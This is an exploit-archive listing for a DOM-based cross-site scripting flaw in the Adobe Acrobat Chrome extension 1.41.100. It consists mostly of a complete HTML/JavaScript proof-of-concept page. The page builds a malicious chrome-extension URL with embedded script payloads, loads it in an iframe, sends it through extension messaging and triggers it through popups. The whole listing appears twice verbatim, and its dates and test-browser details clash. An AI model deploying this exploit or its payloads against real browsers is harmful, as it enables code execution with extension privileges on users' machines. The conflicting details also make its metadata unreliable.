Description
Adobe Acrobat Chrome extension version 1.41.100 suffers from a cross site scripting vulnerability...
Basic Information
ID
PACKETSTORM:212600
Published
Dec 9, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212491/
[+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
DOM-based XSS condition. Malicious payloads are executed inside the extension context.
[+] Date: January 2017
Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)
Type: DOM-based Cross-Site Scripting (XSS)
Users Affected: ~30 million installations (via forced auto-update)
[+] Technical Details:
The extension receives JSON data and renders dynamic HTML without
proper sanitization. The vulnerable code accepts untrusted strings
and injects them into the DOM using innerHTML.
[+] Impact:
An attacker can execute arbitrary JavaScript within the extension
context, bypassing browser Same Origin Policy and triggering
extension-level privileges.
[+] Exploit (PoC):
The following sanitized PoC demonstrates the XSS trigger behavior.
Steps to Reproduce:
1. Install Adobe Acrobat Chrome Extension.
2. Visit a crafted local HTML page.
3. Observe execution of JavaScript inside the frame context.
Save Instructions:
Code below should be saved in `poc.html` and opened locally.
Execution:
Open `poc.html` in Chrome with the extension installed. Observe
console logs confirming rendering inside the extension's frame.
[+] POC :
<!DOCTYPE html>
<html>
<head>
<title>Adobe Acrobat XSS Exploit</title>
</head>
<body>
<h2>Adobe Acrobat Extension DOM XSS Exploit</h2>
<div id="exploit-container"></div>
<script>
// Extension ID and vulnerable page
const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
const VULNERABLE_PAGE = 'data/js/frame.html';
function createExploit() {
// Advanced XSS payload with multiple vectors
const payload = {
panel_op: "status",
current_status: "failure",
message: `
<div style="background:red;color:white;padding:20px;">
<h1>XSS EXECUTED</h1>
<p>Domain: <script>document.write(document.domain)</script></p>
<svg/onload="alert('POC By Indoushka: ' + location.href)">
</div>
<iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
`.replace(/\n/g, ' ').trim()
};
// URL encode the payload
const encodedPayload = encodeURIComponent(JSON.stringify(payload));
const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;
return exploitUrl;
}
function executeExploit() {
const exploitUrl = createExploit();
// Method 1: Try with iframe sandbox bypass
const iframe = document.createElement('iframe');
iframe.sandbox = 'allow-scripts allow-same-origin';
iframe.src = exploitUrl;
iframe.style.width = "500px";
iframe.style.height = "400px";
iframe.style.border = "3px solid red";
document.getElementById('exploit-container').appendChild(iframe);
console.log('Exploit URL:', exploitUrl);
// Method 2: Try to trigger via extension messaging
setTimeout(() => {
try {
// Try to communicate with the extension
chrome.runtime.sendMessage(EXTENSION_ID, {
type: 'trefoil_html_convert',
data: payload
}, response => {
console.log('Extension response:', response);
});
} catch(e) {
console.log('Direct messaging failed:', e.message);
}
}, 1000);
// Method 3: Create a popup with user gesture
document.body.onclick = function() {
window.open(exploitUrl, '_blank', 'width=600,height=400');
};
}
// Execute exploit after page load
window.onload = executeExploit;
// Alternative: Use button with user gesture
document.body.innerHTML += `
<button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
Click to Trigger Exploit (User Gesture Required)
</button>
`;
</script>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212491/
[+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
DOM-based XSS condition. Malicious payloads are executed inside the extension context.
[+] Date: January 2017
Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)
Type: DOM-based Cross-Site Scripting (XSS)
Users Affected: ~30 million installations (via forced auto-update)
[+] Technical Details:
The extension receives JSON data and renders dynamic HTML without
proper sanitization. The vulnerable code accepts untrusted strings
and injects them into the DOM using innerHTML.
[+] Impact:
An attacker can execute arbitrary JavaScript within the extension
context, bypassing browser Same Origin Policy and triggering
extension-level privileges.
[+] Exploit (PoC):
The following sanitized PoC demonstrates the XSS trigger behavior.
Steps to Reproduce:
1. Install Adobe Acrobat Chrome Extension.
2. Visit a crafted local HTML page.
3. Observe execution of JavaScript inside the frame context.
Save Instructions:
Code below should be saved in `poc.html` and opened locally.
Execution:
Open `poc.html` in Chrome with the extension installed. Observe
console logs confirming rendering inside the extension's frame.
[+] POC :
<!DOCTYPE html>
<html>
<head>
<title>Adobe Acrobat XSS Exploit</title>
</head>
<body>
<h2>Adobe Acrobat Extension DOM XSS Exploit</h2>
<div id="exploit-container"></div>
<script>
// Extension ID and vulnerable page
const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
const VULNERABLE_PAGE = 'data/js/frame.html';
function createExploit() {
// Advanced XSS payload with multiple vectors
const payload = {
panel_op: "status",
current_status: "failure",
message: `
<div style="background:red;color:white;padding:20px;">
<h1>XSS EXECUTED</h1>
<p>Domain: <script>document.write(document.domain)</script></p>
<svg/onload="alert('POC By Indoushka: ' + location.href)">
</div>
<iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
`.replace(/\n/g, ' ').trim()
};
// URL encode the payload
const encodedPayload = encodeURIComponent(JSON.stringify(payload));
const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;
return exploitUrl;
}
function executeExploit() {
const exploitUrl = createExploit();
// Method 1: Try with iframe sandbox bypass
const iframe = document.createElement('iframe');
iframe.sandbox = 'allow-scripts allow-same-origin';
iframe.src = exploitUrl;
iframe.style.width = "500px";
iframe.style.height = "400px";
iframe.style.border = "3px solid red";
document.getElementById('exploit-container').appendChild(iframe);
console.log('Exploit URL:', exploitUrl);
// Method 2: Try to trigger via extension messaging
setTimeout(() => {
try {
// Try to communicate with the extension
chrome.runtime.sendMessage(EXTENSION_ID, {
type: 'trefoil_html_convert',
data: payload
}, response => {
console.log('Extension response:', response);
});
} catch(e) {
console.log('Direct messaging failed:', e.message);
}
}, 1000);
// Method 3: Create a popup with user gesture
document.body.onclick = function() {
window.open(exploitUrl, '_blank', 'width=600,height=400');
};
}
// Execute exploit after page load
window.onload = executeExploit;
// Alternative: Use button with user gesture
document.body.innerHTML += `
<button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
Click to Trigger Exploit (User Gesture Required)
</button>
`;
</script>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================